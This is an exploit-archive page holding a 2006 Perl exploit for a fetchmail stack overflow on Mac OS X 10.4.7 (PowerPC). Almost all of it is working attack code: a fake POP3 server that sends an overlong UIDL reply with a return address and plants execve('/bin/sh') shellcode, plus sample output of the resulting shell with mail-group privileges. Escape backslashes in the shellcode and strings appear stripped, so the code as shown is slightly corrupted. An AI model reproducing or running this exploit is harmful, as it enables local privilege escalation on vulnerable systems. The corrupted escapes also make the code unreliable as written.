[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Mac OS X <= 10.4.7 fetchmail Privilege Escalation Exploit (ppc)
# Published : 2006-08-01
# Author : Kevin Finisterre
# Previous Title : Mac OS X <= 10.4.7 fetchmail Privilege Escalation Exploit (x86)
# Next Title : Mac OS X <= 10.4.7 fetchmail Privilege Escalation Exploit
#!/usr/bin/perl
# getpwnedmail.pl
#
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com)
#
# This is a canibalized version of "Kansas City POP Daemon Version 0.0" - Copyright (c) 1999 David Nicol <davidnicol@acm.org>
#
# kevin-finisterres-mac-mini:~ kfinisterre$ /usr/bin/fetchmail -p pop3 --fastuidl 1 localhost -P 1234
# Enter password for kfinisterre@localhost:
# sh-2.05b$ id
# uid=501(kfinisterre) gid=501(kfinisterre) egid=6(mail) groups=6(mail), 81(appserveradm), 79(appserverusr), 80(admin)
#
# http://docs.info.apple.com/article.html?artnum=106704
use Socket;
use IO::Handle;
use IO::Socket;
$banner = "fetchmail ppc exploit - OSX 10.4.7 8J135";
$sc = "iiii" x 10 .
# * PPC MacOS X shellcode
# * ghandi <ghandi@mindless.com>
"x7cxa5x2ax79" . # /* xor. r5, r5, r5 ; r5 = NULL */
"x40xa2xffxfd" . # /* bnel shellcode */
"x7fxe8x02xa6" . # /* mflr r31 */
"x3bxffx01x30" . # /* addi r31, r31, 268+36 */
"x38x7fxfexf4" . # /* addi r3, r31, -268 ; r3 = path */
"x90x61xffxf8" . # /* stw r3, -8(r1) ; argv[0] = path */
"x90xa1xffxfc" . # /* stw r5, -4(r1) ; argv[1] = NULL */
"x38x81xffxf8" . # /* subi r4, r1, 8 ; r4 = {path, 0} */
"x3bxc0x76x01" . # /* li r30, 30209 */
"x7fxc0x4ex70" . # /* srawi r0, r30, 9 */
"x44xffxffx02" . # /* sc ; execve(r3, r4, r5) */
"/bin/sh";
$eip = 0xbfffd238; # No NX to worry about so just hop right on into the stack.
$malstr = "A" x 196 . pack('l', $eip) x 2;
$PortNumber = 1234;
$door = IO::Socket::INET->new( Proto=>'tcp', LocalPort=>$PortNumber, Listen=>SOMAXCONN, Reuse=>1 );
die "Cannot set up socket: $!" unless $door;
$timeout = 60;
$SIG{ALRM} = sub { die "alarm or timeoutn" };
print "open a new window and type - "/usr/bin/fetchmail -p pop3 --fastuidl 1 localhost -P 1234"n";
print "choose any password and press entern";
for(;;)
{
until( $client = $door->accept())
{
sleep 1;
};
$F = fork;
die "Fork weirdness: $!" if $F < 0;
if($F)
{
close $client;
next;
};
close ($door);
$client->autoflush();
&AUTHORIZATION;
&TRANSACTION;
exit;
};
sub OK($)
{
my $A = shift;
$A =~ s/s+Z//g;
print $client "+OK $Arn";
alarm $timeout;
};
sub ERR($)
{
my $A = shift;
$A =~ s/s+/ /g;
$A =~ s/s+Z//g;
print $client "-ERR $Arn";
alarm $timeout;
};
sub AUTHORIZATION
{
$Name = '';
OK "$banner";
NEEDUSER:
$Data = <$client>;
($Name) = $Data =~ m/^user (w+)/i;
unless($Name)
{
ERR "The itsy bitsy spider walked up the water spout";
die if ++$strikes > 5;
goto NEEDUSER;
};
OK "User name ($Name) ok. Password, please.";
$Data = <$client>;
my($Pass) = $Data =~ m/^pass (.*)/i;
$Pass =~ s/s+Z//g;
OK "$Name has " . 8 . " messages";
};
sub TRANSACTION
{
%deletia = ();
START:
$_ = $Data = <$client>;
unless(defined($Data))
{
print "Client closed connectionn";
exit;
};
if (m/^STAT/i){ &STAT; goto START};
if (m/^UIDL/i){ &UIDL; goto START};
# Just cram the shellcode onto the stack...
ERR "Welcome to Pwndertino ! $sc";
goto START;
}
sub STAT
{
alarm 0;
$mm = 0;
$nn = scalar(@Messages);
foreach $M (@Messages){
$mm += -s "$M";
};
OK "8 7035";
};
sub List($)
{
my $M = $Messages[$_[0]-1];
return if $deletia{$M};
print $client $_[0],' ',(-s $M)."rn";
alarm $timeout;
};
sub UIDL
{
print "Sending exploit stringn";
OK "1 " . $malstr;
};
# www.Syue.com [2006-08-01]